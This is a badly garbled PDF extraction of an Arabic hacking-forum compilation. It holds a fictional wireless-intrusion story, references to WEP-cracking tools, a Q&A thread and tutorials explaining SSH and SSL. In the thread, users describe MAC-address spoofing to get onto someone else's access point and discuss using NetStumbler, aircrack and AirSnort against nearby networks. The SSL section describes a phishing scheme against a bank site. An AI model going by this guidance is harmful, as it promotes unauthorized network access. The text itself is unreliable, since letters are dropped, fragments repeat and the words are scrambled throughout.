‫نفسي‪ ‬‬ ‫ي‬ ‫ھل ھذا نوع من التحكم اللي بالطیران سالت‬ ‫يقول‪ ‬‬ ‫ل‬ ‫سمعت صوتا‬ ‫ايھا السیدات والسادة جھ زوا انفسكم للرحلة القادمة احملو بطاقتكم تاكدوا من‬ ‫ن‬ ‫السفر‪ ‬‬ ‫ر‬ ‫جوازات‬ ‫لدي‪ ‬‬ ‫اللعنة كنت اريد مشاھدة نظام الملحة وحفظه عندي لكن لسف لیس ي‬ ‫تعید‪ ‬‬ ‫بوضعیة‪hibernate mode, ‬حیث عندما د‬ ‫ة‬ ‫الوقت للذلك حفظت الجھاز‬ ‫الجارية‪ ‬‬ ‫ة‬ ‫تشغیل الجھ از يكون كما لو كان شغال يعني يحفظ لك كل العملیات‬ ‫بالطائرة‪.. ‬‬ ‫ة‬ ‫سارعت بوضح المحمول في حقیبتي والصحیفة ايضا وانتقلت للركوب‬ ‫السماء صديقة ‪..‬المواج المنطلقة من الشبكات والجھزة المحملة وغیرھاا‪ ‬‬ ‫الوقت‪ ‬‬ ‫ت‬ ‫على كل حال كرسي المغطى بالقماش البیض ساعد على امضاء بعض‬ ‫المفید‪ ..... ‬‬ ‫د‬ ‫كود‪ :‬‬ ‫د‬ ‫‪ References‬‬ ‫‪ Network Stumbler, <http://www.netstumbler.com/> 1.‬‬ ‫‪ S. Fluhrer, I. Mantin, and A. Shamir,“Weaknesses in the Key 2.‬‬ ‫‪ Scheduling Algorithm of RC4,” Aug. 2001,‬‬ ‫>‪ <http://www.wisdom.weizmann.ac.il/~itsik/RC4/Papers/Rc4_ksa.ps‬‬ ‫‪ N. Borisov, I. Goldberg, and D.Wagner, “(In)Security of the WEP 3.‬‬ ‫‪ Algorithm,” www.isaac.cs.berkeley.edu/isaac/wep­faq.html‬‬ ‫>‪ <http://www.isaac.cs.berkeley.edu/isaac/wep­faq.html‬‬ ‫‪ WEPCrack, <http://wepcrack.sourceforge.net/> 4.‬‬ ‫‪ AirSnort, <http://airsnort.shmoo.com/> 5.‬‬ ‫‪ WildPackets AiroPeek NX, 6.‬‬ ‫>‪ <http://www.wildpackets.com/products/airopeek_nx‬‬ ‫‪ Cygwin, <http://www.cygwin.com/> 7.‬‬ ‫‪ Nmap, <http://www.insecure.org/nmap> 8.‬‬ ‫‪ OpenSSH Challenge­Response Buffer Overflow Vulnerabilities , 9.‬‬ ‫>‪ <http://www.securityfocus.com/bid/5093‬‬ ‫‪ GuildFTPd, http://www.guildftpd.com/ 10.‬‬ ‫عملیة‪ .. ‬‬ ‫ة‬ ‫ارجو انكم تكونوا استفدتوا بتجربة‬ ‫مخترقا‪ ‬‬ ‫ا‬ ‫صحیح القصة خیالیة بس لو انك اتبعت الطريقة التالیة ستجد نفسك‬ ‫‪ 176‬‬ ‫‪ ....‬‬ ‫شبكة بل ومسیطر علیھا ‪.‬‬ ‫اي‪ ‬‬ ‫تنبیه انك دخلت للشبكة لس معناه انك سیطرت علیھا ‪..‬يعني مثلك مثل ي‬ ‫‪ ..‬‬ ‫عضو لیس له صلحیة ‪.‬‬ ‫‪ Hacking is Easy‬‬ ‫‪ I wanna send a Bigger greetZ to all My Frinds‬‬ ‫‪ Syrian Hacker ,, AlNary ,, B­Hunter‬‬ ‫ورواء‪ ‬‬ ‫ء‬ ‫السیناريو الثاني تعقب الثر ‪..‬اتركوني بس لكمل القصة على ھدوء‬ ‫‪ Snort­Wireless‬‬ ‫‪S‬‬ ‫شباب شیكوا على مشروع‬ ‫‪ >/<http://www.snort­wireless.org‬‬ ‫‪ ..‬‬ ‫شوفوه وردولي خبر ‪.‬‬ ‫اما عن السئلة التي تسال فسوف افتح لھا موضوعا خاص عشان نجاوب علیھا‬ ‫‪ ....‬‬ ‫كلھ ااااااااااااا ‪.‬‬ ‫‪ ...‬‬ ‫مع انه الى النالسئلة التي سالت اجوبتھا بین السطور ‪.‬‬ ‫‪ ...‬‬ ‫بالنسبة للسوال الول الذي طرح ‪.‬‬ ‫ت‪ ‬‬ ‫عناون الماك ادرس برنامج الـ ‪ NetStumber‬يطلعلك ياه ‪...‬راجع درس الدوات‬ ‫كويس‪ ‬‬ ‫س‬ ‫‪..‬واقراه‬ ‫ذا‪ ‬‬ ‫اما اسوال الثاني بماانك قريب جدا من الشبكة لدرجة ان الكرت يلقطھا فھ ا‬ ‫يعني انك تعرف معرف الخدمة بتاع الشبكات الي انت لقطھا وعیش حیاتك واذاا‬


‫لم ينفع علیك بالماك والقراءة الجیدة لھذه الدروس وغیرھاا‪ ‬‬ ‫النقاشات‪ :‬‬ ‫‪:‬‬ ‫قصة جدا جمیلة ‪,‬بالحقیقة انا عايش نفس القصة بس مو بالمطار والقصة ھي ‪:‬‬ ‫ان‪ :‬‬ ‫يحكى ‪:‬‬ ‫يملك‪ ‬‬ ‫ك‬ ‫انا في يوم من اليام كنت جالس مع صديقي في المكتب وصديقي كان‬ ‫بواسطة‪ ‬‬ ‫ة‬ ‫منظومة انترنت ويقوم بتوزيع النترنت في المنطقة عن طريق الويرلس‬ ‫الكسس بوينت أي يعمل الكسس بوينت ‪ client‬وانا كنت عارف البسويردد‪ ‬‬ ‫اللي‪ ‬‬ ‫مالت الروتر تبع صديقي وفتحت الروتر وقمت بالحث عن الماكات ادريس ي‬ ‫ماك‪ ‬‬ ‫مسموح لھ ا بالدخول فوجدت حاسبة غريبة تحاول الدخول اقصد وجدت ك‬ ‫ابتاعي‪ ‬‬ ‫ي‬ ‫غريب فقمت بتسجیل الماك وذھبت الى البیت وشغلت الحاسبة‬ ‫طريق‪ ‬‬ ‫ق‬ ‫وقمت بتزوير الماك ادريس ودخلت على الكسس بوينت ابتاعي عن‬ ‫ابتاعي‪ ‬‬ ‫ي‬ ‫كتابة الي بي ادريس في النترنت اكسسبلورر وثم كتبت البسويرد‬ ‫ت‪ ‬‬ ‫وعملتھا ‪ client‬وقمت بعمل ‪ scan net‬واخترت المنظومة المقصودة وقمت‬ ‫‪ 771‬‬ ‫بالتفعیل ثم عملت ‪ log‬وفي الحظة اصبحت داخل المنظومة واذا بالیاھو‪ ‬‬ ‫نتستمبلر‪ ‬‬ ‫ر‬ ‫مسنجر يعمل ‪ .‬السؤال اللي اريد ان اطرحه على الخوة ھ و برنامج‬ ‫او‪ ‬‬ ‫ھل يكشف الماك ادريس ابتاع الحاسبات اللي تعمل على ھذه المنظومة و‬ ‫وشكرا‪ ‬‬ ‫ا‬ ‫تلك ام يقوم بالكشف عن الماك ادريس ابتاع المنظومة فقط ؟‬ ‫اخي الكريم ‪..‬برنامج الـ ‪NetStumber‬يرعض لك الماك ادرس بتاع الجھاز الــ‪ ‬‬ ‫ي‪ ‬‬ ‫‪Server‬او الرئیسي ‪..‬شعان تعرف النطاقات الشغالة علیھا الشبكة ‪...‬يعني‬ ‫بالحاسبات‪ ‬‬ ‫ت‬ ‫على حیك ‪..‬يشكف الماك بتاع المنظمومة ‪..‬لني انا مالي‬ ‫الشغالة وامر مستحیل اعرفھاا‪ ‬‬ ‫‪ 2­KAMRAN‬‬ ‫؟؟؟‪ ‬‬ ‫كیف اعرف ارقام الماك ادرس الموثوقه عشان اقدر ازورھا ؟‬ ‫للینكس‪ ‬‬ ‫س‬ ‫عن طريق برنامج ‪NetStumber‬او ‪Kimset‬‬ ‫ج‪ ‬‬ ‫‪3‬قیس علي اج‬‫ي‪ ‬‬ ‫ممكن اعرف الفرق بین ‪aircrack‬و ‪airodump‬والثنان يعملن في‬ ‫ن‪ ‬‬ ‫‪wzcook‬ممكن اخي تشرحلي كیفیة العمل علیھما وھل ھما يعملن‬ ‫ممكن‪ ‬‬ ‫ن‬ ‫في الوندوز ؟ طبعا حسب ما قراءة يعملن في الوندوز لكن‬ ‫المنتدى‪ ‬‬ ‫ى‬ ‫تشرحلي كیفیة العمل علیھ ما واكون ممتن لك والخوة في‬ ‫نعم بامكانك المعرفة ‪.. AirCrack‬تقوم بعمل كسر بالقوة العنیفة ‪..‬للتشفیر ‪...‬‬ ‫ق‪ ‬‬ ‫اما الـ ‪AirDump‬فستخدمھما عندما تكون عضو بالشبكة عضو موثوق‬ ‫‪ Read The F****** Manual‬‬ ‫‪R‬‬ ‫اشرح لك كیفیة العمل علیھما ‪..‬ھل اقول لك‬ ‫‪ 4­WaNeS‬‬ ‫الدخول‪ ‬‬ ‫ل‬ ‫في المنطقة التي أنا فیھا توجد شبكتین لسلكیة وطبعً حاولت‬ ‫اا‪ ‬‬ ‫كرت‪ ‬‬ ‫علیھا لكن طلب مني الیوزر والباسورد لكل شبكة أسم يكتشفھا ت‬ ‫معقول‪ ‬‬ ‫ل‬ ‫الشبكة من دون أدوات بحكم قربھا وأعتقد أن الباسورد أكتشافه‬ ‫ذه‪ ‬‬ ‫لنه عند عمل شبكة لسلكیة يطلب منك كلمة وعلى حسب ھ ه‬ ‫لء‪ ‬‬ ‫الكلمة يقوم بأعطائك خیارات للباسورد فھل ھذا الباسورد متغیر أم ء‬ ‫ل‪ ‬‬ ‫جھاز الشبكة ‪Wireless­G ADSL Gateway ­ WAG54G‬طبعً أسئل‬ ‫اا‪ ‬‬ ‫جدار‪ ‬‬ ‫ر‬ ‫للستزادة فقط واالله يغنینا بحللة عن حرامه وأعتقد بأنه ھناك‬ ‫اا‪ ‬‬ ‫ر‪ ‬‬ ‫حماية للتصدي لمحاولت الختراق وشك ًر‬ ‫‪ 871‬‬ ‫ى‪ ‬‬ ‫اول مالك ومال جدار الحماية بعدين اسمه ‪Firewall‬ھذا بعد ان تسیطر على‬ ‫قبل‪ ‬‬ ‫الشبكة تحاول تحسب حسابه مش ل‬ ‫ثانیا بما ان كرت الشبكة يلقط الشبكات معناه انتم بمداھا ‪001%‬كل ماعلیك‬ ‫ك‬ ‫جمة‪ ‬‬ ‫استخدام الطرق المشروحة ‪..‬للماھ ة‬


‫ج‪ ‬‬ ‫‪5‬قیس علي اج‬‫او‪ ‬‬ ‫اخي بالنسبة للبرنامج ‪netstumbler‬ھل يعمل مع ‪ access point‬و‬ ‫ج‪ ‬‬ ‫‪wireless card‬فانا امتلك اكسس بوينت وعندما اعمل على البرنامج‬ ‫رابط‪ ‬‬ ‫المذكور واعمل سكان يخرج عبارة ليوجد كارد ويرلس علما انه انا ط‬ ‫اكسس بوينت فما العمل ؟ الوندوز المستخدم اكس يي سیرفز باك ‪ 2‬‬ ‫‪ B­Hunter‬‬ ‫‪B‬‬ ‫الجابة اتت من اخي‬ ‫الكروت‪ ‬‬ ‫ت‬ ‫ھو خاص بالكروت لنه يدور على الكسس بوينت ما يدور على‬ ‫وبیشتغل‪ ‬‬ ‫ل‬ ‫لو كان بجھ ازك كرت قم بتفعیل الكرت وشغل البرنامج‬ ‫الطلق‪ ‬‬ ‫ق‬ ‫ل دخل للبرنامج بالكسس بوينت على‬ ‫منه‪ ‬‬ ‫لنه يبحث عنه ل يبحث ه‬ ‫اللقاء‪ ‬‬ ‫ء‬ ‫الى‬ ‫‪ 6­B­Hunter‬‬ ‫‪ 0022‬‬ ‫‪0‬‬ ‫يا سلكر انا ابي اي برنامج يقدر يتعرف على تشیب النتل‬ ‫المشكله انه كل البرامج "في لینكس "تتعرف علیه بشكله الحقیقي ""‪ ‬‬ ‫مثل‪ ‬‬ ‫تشیب ولیس كرت "ولذلك ما يدعموه وخصوصا كیسمیت "بالظبط ل‬ ‫اللقاء‪ ‬‬ ‫ء‬ ‫مشكلة الوين مودم سوفت ولیس ھارد "عندك حل ؟ الى‬ ‫على‪ ‬‬ ‫مثل ماقلتلك مشلكة الوين مودم او الكروت الداخلیة على اتي تركب ى‬ ‫ي‪ ‬‬ ‫مداخل ‪PCI‬بان قیادتھا لتكون ھ اردوير بل سوفت وير ‪..‬يعني النظام الي‬ ‫يشوف تعريف التشیب مايقدر يقود الكرت ‪..‬بل يجب ان يكون ھناك تعريف ‪...‬‬ ‫والحل ‪.‬اما ان تبرمج برنامج قیادة او تنتظر دعم للكرت تبعك ‪..‬او تدور اذا كان‬ ‫ن‬ ‫ئ‪ ‬‬ ‫ھناك ‪plugins‬انا صراحة مادورت على ھیك شئ‬ ‫‪ 7­zdce‬‬ ‫ي‪ ‬‬ ‫السلم علیكم ‪0000000000001‬شكر الك خیو على ھالموضوع الي‬ ‫ويا‪ ‬‬ ‫واالله اكثر من قمه وبتمنا انه ھالموضوع ما يوصل لحد معین ونوقف ا‬ ‫‪ 971‬‬ ‫كمان‪ ‬‬ ‫ن‬ ‫حبذا اخي تسترسل بالشرح لنه موضوووع حلو كثیر وممتع‬ ‫برنامج‪ ‬‬ ‫ج‬ ‫اخووووي ممكن اتساعدني وتحكیلي كیف اركب‬ ‫ه‪ ‬‬ ‫السكان ‪Network Stumbler‬ركبته على ويندوز اكس بي بس المشكله‬ ‫ع‪ ‬‬ ‫ايضل يحكییلي ‪No wireless adaoter found‬شفلك حل لحلمشكله مع‬ ‫عندي‪ ‬‬ ‫ي‬ ‫العلم اني شابك نت عن طريق اللسلكي وكمان كرت الشبكه‬ ‫‪Macronix‬وكمان اذا ما بنفع ھ اد موجود كرت شبكه انتل والخوه ماا‪ ‬‬ ‫بالشرح‪ ‬‬ ‫ح‬ ‫تبخلو بالرد ملحظه ارجو السترسال‬ ‫‪ ...‬‬ ‫ياحبیبي الحل الناھ ئي لمشكلتك انك تعرف كرت الشبكة عندك ‪.‬‬ ‫او قك بالغاء التعريف ومن ثم عرف وشغل الكرت وشغل البرنامج وقتھا يلقط انه‬ ‫ه‬ ‫‪ Scan‬‬ ‫‪S‬‬ ‫عندك كرت شبكة ‪..‬وابدا بالـ‬ ‫ج‪ ‬‬ ‫‪8‬قیس علي اج‬‫ع‪ ‬‬ ‫شكرا على الرد السريع ‪,‬اخي بالنسبة للبرنامج ‪airesnort‬وجدت بموقع‬ ‫ل‪ ‬‬ ‫البرنامج الرسمي بتنه يعمل مع الوندوز ‪xp‬فھل ھناك احد جرب العمل‬ ‫على‪ ‬‬ ‫به على الوندوز وشكرا ‪,.‬انا حالیا سوف احاول تجريب العمل به ى‬ ‫‪ xp‬‬ ‫الوندوز ‪x‬‬ ‫لنظام‪ ‬‬ ‫م‬ ‫اخي انا مجربه على لینكس لكن باان الشركة نفسھا عامل نسخة منه‬ ‫ئ‪ ‬‬ ‫‪Windoze‬معناه نفس الشئ‬ ‫ج‪ ‬‬ ‫‪9‬قیس علي اج‬‫ل‪ ‬‬ ‫اخي العزيز ما راءيك بالداة ‪aircrack‬ھل ھي اداة جديدة ويمكن العمل‬ ‫المعلومات‪ ‬‬ ‫ت‬ ‫بھ ا في بییئة الوندوز وشكرا على الجابة مقدما‪.‬ويمكن بعض‬ ‫وان‪ ‬‬ ‫عنھ ا من خلل تجربتك الشخصیة مع ھذه الداة ان كنت سبق ن‬ ‫تعاملت معھا ‪ ..‬‬ ‫اخي انا مش مھمتي اني اشرح ‪Tool ...‬الداة جیدة في مجال كسر التشفیر‬ ‫ر‬ ‫‪ Readme‬‬ ‫‪R‬‬ ‫‪WEP .....‬ويمكن الستغناء عنھا واستعامل ‪WEPCrack ....‬والـ‬ ‫موجود‪ ‬‬ ‫د‬


‫_________________________________________________________‬ ‫_________________________________________________________‬ ‫_________________________________________________________‬ ‫_________________________________________________________‬ ‫‪ 081‬‬ ‫‪ ssh‬‬ ‫ة ‪s‬‬ ‫برتوكول القشرة المنة‬ ‫‪ Linux­root‬‬ ‫‪L‬‬ ‫للكاتب‪:‬‬ ‫‪ ssh‬‬ ‫برتوكول القشرة المنة ‪s‬‬ ‫ض‪ ‬‬ ‫تم تطوير برتكول القشرة المنة ‪ ssh or secure shll‬كبرتكول ارسال منخفض‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫المستوى امن ويتیح للمستخدم تسجیل دخوله لكمبیوتر بعید عبر‬ ‫لخر‪ .‬‬ ‫‪.‬‬ ‫وتنفیذ اوامر فیھا ونقل ملفات من كمبیوتر‬ ‫الفاية من ‪ssh‬ا يحل محل ‪ telnet­rcp­rsh­rlogin‬في الكمبیوترات المتوافق مع‬ ‫ع‬ ‫‪ ftp‬‬ ‫‪Linux‬لتزويدھا بأرسال امن للملفات تم تطوير ‪2 ssh‬كبديل للــ ‪f‬‬ ‫تقنیة ‪ ssh‬تحمي التصالت عبر النترنت بتشفیر كلمات المرور والبینات‪ ..‬‬ ‫ة‪ ‬‬ ‫يزود ‪ ssh‬تحقق لصحة المضیف والمستخدم وضغطا للبینات وحماية لسرية‬ ‫نظام‪ ‬‬ ‫م‬ ‫البینات وتشفیر قوي للمعلومات ‪.‬لكنه لیس مصمما لیحمي عیوب‬ ‫التشغیل‪ .‬‬ ‫‪.‬‬ ‫يتكون برتكول اقشرة المنة ‪ ssh‬من ثللث مكوناة رئیسیة‪ ::‬‬ ‫‪ ssh­trans‬‬ ‫‪s‬‬ ‫‪1‬برتكول طبقة الرسال‬‫ل‬ ‫الشبكة‪ .‬‬ ‫‪.‬‬ ‫يزود تحققا امن وسرية وسلمة‬ ‫‪ ssh­userauth‬‬ ‫‪s‬‬ ‫‪2‬برتكول التحقق من صحة المستخدم‬‫م‬ ‫الرسال‪ .‬‬ ‫‪.‬‬ ‫يتحقق من صحة المستخدم من جھة العمیل ويعمل فوق طبقة‬ ‫‪ Ssh conn‬‬ ‫‪S‬‬ ‫‪3‬برتكول التصال‬‫ل‬ ‫صحة‪ ‬‬ ‫ة‬ ‫يرسل تعقیبا مشفر في عدة منظقیة ويعمل فوق برتكول التحقق من‬ ‫المستخدم‪ .‬‬ ‫‪.‬‬ ‫ويحمي ‪ ssh‬ايضا من الخطار التالیه‪ ::‬‬ ‫‪1‬تزوير الرزم‪ ..‬‬‫المضیف‪ .‬‬ ‫‪.‬‬ ‫‪2‬تزوير ‪Ip‬‬‫التنصت‪ .‬‬ ‫‪.‬‬ ‫‪3‬‬‫‪ 181‬‬ ‫ل‪ ‬‬ ‫شرح ‪ Ssl‬الجزء الول‬ ‫‪ Acid Burn‬‬ ‫‪A‬‬ ‫للكاتب‪:‬‬ ‫=====================‪ ‬‬ ‫‪ :INTRODUCTION TO SSL‬‬ ‫=====================‪ ‬‬ ‫طبعا اكید فى يوم و انت تتصفح النترنت و اتصلت بأى موقع عن طريق الصدفه‬ ‫ه‬ ‫ه‪ ‬‬ ‫فأنك تلحظ ما يسمى بال ‪ PADLOCK ICON‬و ھى عباره عن ايقونه موجوده‬ ‫فى الشريط فى اسفل متصفحك و ھى تكون عباره عن علمه تعجب ! صفراءء‬ ‫ك‪ ‬‬ ‫او علمه ‪ X‬حمراء و لھ ا اشكال اخرى كثیره تختلف حسب متصفحك‬ ‫العلمه؟‪ ‬‬ ‫؟‬ ‫و الن سؤالنا ھو ماذا تعنى ھذه‬ ‫و الجابه ان ھذه العلمه تعنى ان ھذا الويب محمى ب ‪ ssl‬اى طبقه امنیه و‪ ‬‬ ‫كما ھو ظاھر فى العنوان ان ال ‪ ssl‬ھى ال (‪ (Secure Sockets Layer‬و ھى‪ ‬‬ ‫تفعل‪ ‬‬ ‫ل‬ ‫تشیر الى بروتوكول او تیكنیك معین يؤكد التصال المن بالويب سیت و‬ ‫ه‪ ‬‬ ‫ھ ذا بطريقتین ‪ .‬الولى‪:‬ھى ان ال ‪ SSL‬توفر طرق عديده للتعرف على ھويه‬ ‫بالويب‪ ‬‬ ‫ب‬ ‫المتصل بالويب سیت و طبعا لنه من الدرورى معرفه ھويه المتصل‬ ‫ل‪ ‬‬ ‫سیت قبل بدايه تبادل المعلومات بینھم و تكون ال ‪ SSL‬مطلوبه جداا ب ال‬ ‫ل‪ ‬‬ ‫‪digital certificates‬و سنعرف ما ھى ‪ .‬و الطريقه الثانیه ھى ‪:‬انھا تحول‬ ‫المعلومات الى ‪ UNREADABLE FORMAT‬اى الى صیغه ل تستطیع قرائتھا اى‬ ‫ى‬ ‫النترنت‪ .‬‬ ‫‪.‬‬ ‫تشفرھا عند انتقالھ ا خلل شبكه غیر امنه مثل‬ ‫اذن نرجع نقول تعريف بسیط عن ال ‪ SSL‬لتسھیل الفھم‪ ::‬‬


‫المتصفح‪ ‬‬ ‫ح‬ ‫ھى نظام أمني يسمح للتطبیقات بتشفیر البیانات التي تنتقل من‬ ‫المقابلة‪ ‬‬ ‫ة‬ ‫الى وحدة الخدمة‬ ‫و سوف نتكلم عن اشیاء كثیره فى ھذا الدرس عن ال ‪ SSL‬فسوف نتكلم عن‬ ‫ن‬ ‫لماذا‪ ‬‬ ‫ا‬ ‫قوه حمايه ھ ذا البروتوكول و سوف نتحدث ايضا عن عن كیفیه عملھا و‬ ‫ايضا‪ ‬‬ ‫ا‬ ‫تكون صلح للدفاع ضد الھاكرز و كیف تساعد الھاكرز فى بعض الحیان‬ ‫‪ Digital‬‬ ‫‪D‬‬ ‫و الن قد ذكرت كلمه اعتقد ان البعض لم يفھمھا جیدا و ھى كلمه‬ ‫‪Certificates‬و سنقوم الن بالتفسیر لمعناھا‪ ..‬‬ ‫‪ : Digital Certificates‬‬ ‫=======================‪ ‬‬ ‫لكى تفھم ال ‪ SSL‬جیدا يجب اول ان تفھم ال ‪ Digital Certificates‬و ھو عباره‬ ‫ه‬ ‫‪ 281‬‬ ‫تام‪ ‬‬ ‫عن میكانزم او بروتوكول يستطیع تحديد اى شئ او التعرف علیه بوضوح م‬ ‫نحن‪ ‬‬ ‫مثل شخص او ويب سرفر فى نظام متكامل و واسع مثل النترنت ‪ .‬و ن‬ ‫المعرفه‪ ‬‬ ‫ه‬ ‫نسمى النترنت نظام مفتوح و واسع لننا ل نملك السیطره و‬ ‫ى‪ ‬‬ ‫بالشخاص الذين يستخدمون ھذا النظام‪ .‬ال ‪ Digital Certificates‬ھذا يحتوى‬ ‫بین‪ ‬‬ ‫على المعلومات الذى تحدد ھ ويه المستخدم للنظام و يؤمن التصال ن‬ ‫المستخدم و النظام ايضا كما قلنا بالتعرف الكامل على ھويته‪ .‬و يمتلك ھذا ال‬ ‫ل‬ ‫ت‪ ‬‬ ‫‪Digital Certificates‬ثلث جھات عالیه و ھم الحكومات و البنوك و و الشركات‬ ‫‪ public‬‬ ‫‪p‬‬ ‫الكبرى ‪.‬و يحتوى ال ‪ Digital Certificates‬على ما يسمى ب ال‬ ‫ه‪ ‬‬ ‫‪encryption key‬لحامل ھذا ال ‪ Digital Certificates‬سواء كان بنك او شركه‬ ‫‪...‬الخ‪ .‬‬ ‫‪.‬‬ ‫للتوضیح‪ :‬‬ ‫‪:‬‬ ‫و لنعطى مثل‬ ‫ال‪ ‬‬ ‫و لنفرض ان بنك من البنوك يريد نقل معلومات بنكیه مھمه بأستخدام ل‬ ‫‪encryption‬و طبعا الن عرفنا معنى ھذه الكلمه و معناھا تشفیر و طبعا ھذه‬ ‫ه‬ ‫‪p‬‬ ‫‪public‬‬ ‫التشفیر يجب ان يكون له مفاتیح و ھذه المفاتیح ھى ما يسمى ب ال‬ ‫ل‪ ‬‬ ‫‪encryption key .‬اعتقد الن فھمنا ما ھى مفاتیح التشفیر الذى يتضمنھا ال‬ ‫ر‪ ‬‬ ‫‪Digital Certificates .‬و طبعا يجب وجود ھ ذه المفاتیح حیث ان النتقال عبر‬ ‫دون‪ ‬‬ ‫النترنت غیر امن و لذلك توجد ھذه المفاتیح لكى تؤمن وصول المعلومات ن‬ ‫المعلومات‪ .‬‬ ‫‪.‬‬ ‫تسرب و دون معرفه الجھه الخرى التى تصل الیھا‬ ‫م‪ ‬‬ ‫و بالتالى فتجتاز ال ‪ SSL‬ھذا المانع اى تسرب المعلومات عن طريق استخدام‬ ‫ال ‪ Digital Certificates‬و على فكره الترجمه الحرفیه لھذه الكلمه ھى‪ ‬‬ ‫عالمى‪ ‬‬ ‫ى‬ ‫"شھ ادات رقمیه" و لكن من الفضل ان تتعامل معھا على انھا نظام‬ ‫‪ SSL‬‬ ‫للتعرف على الھ ويات و التشفیر و يستخدم عن طريق ال‪S .‬‬ ‫ح‪ ‬‬ ‫و طبعا فقد فھمنا الن ان ال ‪ Digital Certificates‬يحتوى ايضا على مفاتیح‬ ‫المعلومات‪ .‬‬ ‫‪.‬‬ ‫التشفیر التى تستخدم عند الحاجه لفك التشفیر عن‬ ‫ن‪ ‬‬ ‫عندما نستخدم ال ‪ SSL‬لتشفیر اصال ب ويب سرفر معین فیكفى ان يكون‬ ‫السرفر وحده لديه ال‪ certificate.‬و يمكن للمستخدمین تعريف انفسھم للويب‬ ‫ب‬ ‫‪ SSL‬‬ ‫‪S‬‬ ‫عن طريق الیوزر نیمز و ال ‪ PIN CODES‬او الباسوردس و كما نرى ان ال‬ ‫ل‪ ‬‬ ‫‪ 3V‬الن تستطیع اعطاء الصلحیه للمستخدم بتعريف نفسه بأستخدام ال‬ ‫‪ 'client side‬‬ ‫'‬ ‫‪Digital Certificates‬اى نظام التشفیر ‪.‬و ھ ذا التعريف يسمى ب‬ ‫' ‪authentication‬اى توثیق جانب المستخدم و ھ ذا طبعا يزيد من امن الموقع‪..‬‬ ‫‪ 381‬‬ ‫ي‪ ‬‬ ‫شرح ‪ Ssl‬الجزء الثاني‬ ‫‪ Acid Burn‬‬ ‫‪A‬‬ ‫للكاتب‪:‬‬ ‫م‪ ‬‬ ‫مره اخرى نتقابل فى الجزء الثانى من موضوع ال ‪ SSL‬اتمنى اكون اقدم لكم‬ ‫كلمه‪ ‬‬ ‫ه‬ ‫الستفاده من مواضیعى و احب ان اكتب كلمه شكر لكل من اعطانى‬ ‫يمكن‪ ‬‬ ‫ن‬ ‫تشجیع و لكل من كتب رد على موضوعى و الن دعونا نكمل الدرس‬ ‫المره‪ .‬‬ ‫‪.‬‬ ‫يكون شیق ھذه‬ ‫‪ :The Value of Server Certificates of Authentication‬‬ ‫===============================‪ ====== ‬‬


‫ل‪ ‬‬ ‫استخدام ال ‪ DIGITAL CERTIFICATES‬يسمح لل ‪ SSL‬بتقديم ال‬ ‫ى‪ ‬‬ ‫‪ authentication‬للمستخدم اى بتقديم التوثیق او الثقه بمعنى انھا تعطى‬ ‫الوعد بأن السرفر الذى يتصل به الیوزر ھو فعل السرفر الذى يريده الیوزر‪ .‬و ھذه‬ ‫ه‬ ‫بأستعمال‪ ‬‬ ‫ل‬ ‫طبعا تعتبر نقطه ھ امه جداا بالنسبه للیوزر خاصه اذا كان سیقوم‬ ‫‪ PIN CODE‬‬ ‫‪P‬‬ ‫معلومات شخصیه مھ مه مثل الكريدت كارد نمبر الخاص به او ال‬ ‫له‪ .‬‬ ‫لشئ ما مھم بالنسبه ‪.‬‬ ‫يطلبه‪ ‬‬ ‫ه‬ ‫و لكن كیف حدث ان السرفر الذى يتصل به الیوزر ھو لیس السرفر الذى‬ ‫؟‪ ‬‬ ‫؟‬ ‫تكون‪ ‬‬ ‫ن‬ ‫العملیه تعتبر سھ له فى النترنت‪ .‬ففى النترنت نعرف ان الويب سرفرس‬ ‫م‪ ‬‬ ‫معروفه ب ال ‪IP‬نمبر الخاص بكل سرفر و بالنسبه لل ‪IP‬فتعريفه ھو انه رقم‬ ‫ن‪ ‬‬ ‫فريد من نوعه يسمى ‪ UNIQUE 32­BIT NUMBER‬و صعب جداا على النسان‬ ‫تذكره او حفظ كمیه كبیره منه‪ .‬ال ‪ DNS‬اى ال ‪ Domain Name System‬و‪ ‬‬ ‫ه‪ ‬‬ ‫میكانزمات اخرى كثیره تتحكم فى تنظیم و تحويل ال ‪IP‬الى اسماء سھله‬ ‫ه‪ ‬‬ ‫يستطیع النسان تذكرھا مثل ‪ 'www.internetbanking.com ' .‬ارجو من الخوه‬ ‫مراجعه موضوعى الول عن ال ‪ DNS‬لمعرفه القصه بالتفصیل‪ ..‬‬ ‫فى‪ ‬‬ ‫و الن عندما يكتب يوزر عنوان مثل ھذا ' ‪ 'www.internetbanking.com‬ى‬ ‫الموقع‪ ‬‬ ‫ع‬ ‫متصفحه و يضغط انتر تحصل عملیه معقده ليجاد ھذا السرفر او‬ ‫ذه‪ ‬‬ ‫المطلوب "راجعو الموضوع الول لمعرفه العملیه" و لكن يوجد جزء كبیر من ھ ه‬ ‫العملیه يكون دائما ما بعد تحكم الیوزر و الويب ادمنستراتور و تكون العملیه لھاا‪ ‬‬ ‫موقع‪ ‬‬ ‫ع‬ ‫قابلیه للھجوم علیھ ا من عده نقاط‪.‬بمعنى ادق انه عندما يطلب الیوزر‬ ‫ن‪ ‬‬ ‫مثل ھذا ' ‪ 'www.internetbanking.com‬اى موقع بنك اذن فھو معرض لن يكون‬ ‫نفسه‪ .‬‬ ‫‪.‬‬ ‫متصل بسرفر يتحكم فیه مھاجم او ھاكر و لیس البنك‬ ‫توضیحا‪ :‬‬ ‫‪:‬‬ ‫بمعنى اكثر‬ ‫تعتبر‪ ‬‬ ‫ر‬ ‫تخیل معى لو ان ھ اكر صمم ويب مماثل تماما دون ادنى اختلف اى‬ ‫‪ 481‬‬ ‫ارقام‪ ‬‬ ‫م‬ ‫نسخه مطابقه الى موقع ھ ذا البنك فسوف يستعملون الیوزرس طبعا‬ ‫ط‪ ‬‬ ‫الكردت كارد و ال ‪ PIN CODES‬الخاصه بھم فى الموقع و بعد الكتابه و الضغط‬ ‫على‪ ‬‬ ‫على زر انتر لتنفیذ اى عملیه مثل تحويل مبلغ معین مثل كل ما يظھر ى‬ ‫‪ there was a technical problem with the site and "please try‬‬ ‫‪t‬‬ ‫الشاشه ھو‬ ‫س‪ ‬‬ ‫‪again later".‬اى ان ھ ناك مشكله فى السرفر و حاول مره اخرى ‪ .‬و فى نفس‬ ‫لسرقه‪ ‬‬ ‫ه‬ ‫ھذه اللحظه يكون الھ اكر قد بدء بأستخدام الرقم المكتسب الجديد‬ ‫البولیس‪ ‬‬ ‫س‬ ‫بعض الموال من الموقع الحقیقى فى راحه تامه دون اى ازعاج من‬ ‫التحدث‪ ‬‬ 